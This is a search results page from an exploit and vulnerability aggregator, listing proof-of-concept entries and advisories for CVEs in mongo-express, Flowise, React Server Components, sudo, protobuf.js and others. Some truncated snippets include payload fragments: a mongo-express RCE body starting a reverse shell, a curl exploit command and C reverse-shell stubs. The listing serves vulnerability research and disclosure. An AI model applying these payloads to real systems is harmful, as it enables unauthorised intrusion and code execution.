Lucene search
+L

1117 matches found

Kitploit
Kitploit
added 2026/09/22 4:12 p.m.9 views

CVE-2019-10758

CVE-2019-10758 mongo-express remote code execution, reverse shell code as follows: POST BODY 1: document=this.constructor.constructor"return process".mainModule.require"childprocess".execSync"mkfifo /tmp/f" POST BODY 2: document=this.constructor.constructor"return...

9.9CVSS8.5AI score0.84726EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/22 1:48 p.m.6 views

CVE-2025-58434-59528

CVE-2025-58434 + CVE-2025-59528 Cadena de explotación para dos vulnerabilidades que afectan Flowise = 3.0.5. Vulnerabilidades CVE-2025-58434 — Toma de Cuenta No Autenticada El endpoint de olvido de contraseña devuelve un token de restablecimiento de contraseña válido en la respuesta de la API sin...

10CVSS7.6AI score0.86218EPSS
SaveExploits32
Kitploit
Kitploit
added 2026/09/22 1:28 p.m.11 views

CVE-2025-55182

CVE-2025-55182 This repository contains a PoC reproduction of CVE-2025-55182 , a critical security vulnerability in React Server Components RSC that allows unauthenticated arbitrary code execution. Description The vulnerability exists in how React Server Components deserialize "Server Actions" fr...

10CVSS8.2AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 11:44 a.m.7 views

sudoinjection

CVE-2025-32463: Local Privilege Escalation via sudo -R NSS Injection Summary This PoC demonstrates local privilege escalation on Linux systems via abuse of the sudo -R option in conjunction with a custom NSS module. It targets the vulnerability CVE-2025-32463, which stems from unsafe handling of...

9.3CVSS8.4AI score0.61039EPSS
SaveExploits71References1
Kitploit
Kitploit
added 2026/09/22 6:32 a.m.13 views

CVE-2026-40897

CVE-2026-40897 Remote Code Execution in Math.js Expression Parser ★ CVE-2026-40897 Remote Code Execution in Math.js PoC ★ https://github.com/user-attachments/assets/8c394039-f00a-4875-991a-fb5f40bc6898 Overview CVE-2026-40897 is a Sandbox Bypass leading to Remote Code Execution vulnerability in...

8.8CVSS6.5AI score0.00551EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/09/22 6:19 a.m.7 views

React2Shell-CVE-2025-55182-The-Deserialization-Bug-That-Broke-the-Web

React2Shell CVE-2025-55182: The Deserialization Bug That Broke the Web ⚡ React2Shell, CVE-2025-55182, RCE Vulnerability: A critical breakdown of the unsafe deserialization flaw in React Server Components that enables unauthenticated remote code execution across default React/Next.js setups. ⏩ TL;...

10CVSS8.1AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/20 6:15 p.m.9 views

CVE-2018-6574

CVE-2018-6574 Steps to reproduce: 1. Create a .c file containing the malicious command revshell: root@kitploit: include include static void malicious attributeconstructor; void malicious system""; 2. Compile it using GCC. You must compile it on the exact architecture and OS as the target e.g. Lin...

7.8CVSS7.3AI score0.07648EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/20 2:42 a.m.7 views

CVE-2019-10758

CVE-2019-10758 PoC Setup root@kitploit: docker run -p 27017:27017 -d mongo npm install [email protected] cd nodemodules/mongo-express/ && node app.js cURL exploit root@kitploit: curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data...

9.9CVSS8.5AI score0.84726EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/19 3:03 p.m.10 views

CVE-2018-4121

CVE-2018-4121 - Safari Wasm Sections POC RCE Exploit by MWR Labs c 2018 Details this proof of concept exploit targets Safari 11.0.3 13604.5.6 on macOS 10.13.3 17D47 versions only. compile the payload of your choice as a dylib with a constructor run python filetojsarray.py your.dylib payload.js...

8.8CVSS7.7AI score0.11496EPSS
SaveExploits6
NVD
NVD
added 2026/09/19 12:16 p.m.12 views

CVE-2026-93985

OpenPanel js-runtime through commit bad75bdd contains a sandbox escape vulnerability in the JavaScript webhook template validator that fails to block computed member access to constructor chains. Attackers with project write access can create webhook templates using computed property notation to...

9.9CVSS0.00476EPSS
SaveExploits0References2
CVE
CVE
added 2026/09/19 11:53 a.m.62 views

CVE-2026-93985

OpenPanel js-runtime through commit bad75bdd is affected by a sandbox escape in its JavaScript webhook template validator . The validator fails to block computed member access to constructor chains, allowing attackers with project write access to craft webhook templates using computed property no...

9.9CVSS0.00476EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/18 10:06 p.m.6 views

CVE-2026-41242

CVE-2026-41242 — protobuf.js Code Injection to RCE CVSS 9.4 Critical | Code Injection CWE-94 Overview protobuf.js npm: protobufjs versions ≤ 7.5.4 and ≤ 8.0.0 are vulnerable to arbitrary code execution via type names in the protobuf schema. The @protobufjs/codegen module concatenates type names...

9.8CVSS7.5AI score0.00774EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/18 4:39 p.m.10 views

CVE-2025-59528

CVE-2025-59528: Flowise CustomMCP Remote Code Execution PoC A Go proof of concept for CVE-2025-59528 targeting Flowise versions...

10CVSS8.3AI score0.86218EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/18 2:27 a.m.6 views

CVE-2025-59528-POC

CVE-2025-59528 - FlowiseAI CustomMCP Remote Code Execution CVSS 10.0 Critical | Blind RCE | FlowiseAI Flowise = 2.2.7-patch.1 and 3.0.6 Overview A critical remote code execution vulnerability in the CustomMCP node of FlowiseAI Flowise. The convertToValidJSONString function passes user-supplied...

10CVSS8.4AI score0.86218EPSS
SaveExploits23References3
Kitploit
Kitploit
added 2026/09/18 12:07 a.m.10 views

CVE-2025-59528

CVE-2025-59528 – Flowise CustomMCP Node RCE PoC Overview This repo containts proof of concept demonstrating CVE-2025-59528 in Flowise v3.0.5 The vulnerability exists in the customMCP node, where user-supplied mcpServerConfig input is processed in a way that leads to JavaScript code execution via...

10CVSS8.1AI score0.86218EPSS
SaveExploits23References1
Kitploit
Kitploit
added 2026/09/17 11:57 p.m.8 views

CVE-2025-55182

CVE-2025-55182 If you're looking for an actual explanation, msanft/CVE-2025-55182 has a nice one with a working PoC. This repository only contains some things I tried, which yielded interestingish results. ./thing.py now contains a working PoC, most of which was taken from...

10CVSS7.8AI score0.99802EPSS
SaveExploits391References4
Kitploit
Kitploit
added 2026/09/17 12:53 a.m.11 views

CVE-2021-42342

CVE-2021-42342 CVE-2021-42342 RCE POC1:just prints root@kitploit: include include include include static void beforemainvoid attributeconstructor; static void beforemainvoid write1, "Hello World!\n", 14; POC2: reverse shell root@kitploit: include include include include char serverip=""; uint32t...

9.8CVSS8.5AI score0.5946EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/16 11:31 a.m.13 views

CVE-2025-55182

CVE-2025-55182 This repository contains a PoC reproduction of CVE-2025-55182 , a critical security vulnerability in React Server Components RSC that allows unauthenticated arbitrary code execution. Description The vulnerability exists in how React Server Components deserialize "Server Actions" fr...

10CVSS8.2AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/15 7:23 p.m.12 views

CVE-2025-59528.yaml

CVE-2025-59528.yaml Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses...

10CVSS8.2AI score0.86218EPSS
SaveExploits23
NVD
NVD
added 2026/09/15 11:17 a.m.4 views

CVE-2026-57138

PraisonAI is a multi-agent teams system. From 1.4.0 until 1.7.2, codeMode in src/praisonai-ts/src/tools/builtins/code-mode.ts executes untrusted JavaScript with new Function inside withsandbox and relies on a small source-code blocklist plus shadowed process and require properties. Code can use...

9.9CVSS0.00394EPSS
SaveExploits0References3
Rows per page
Query Builder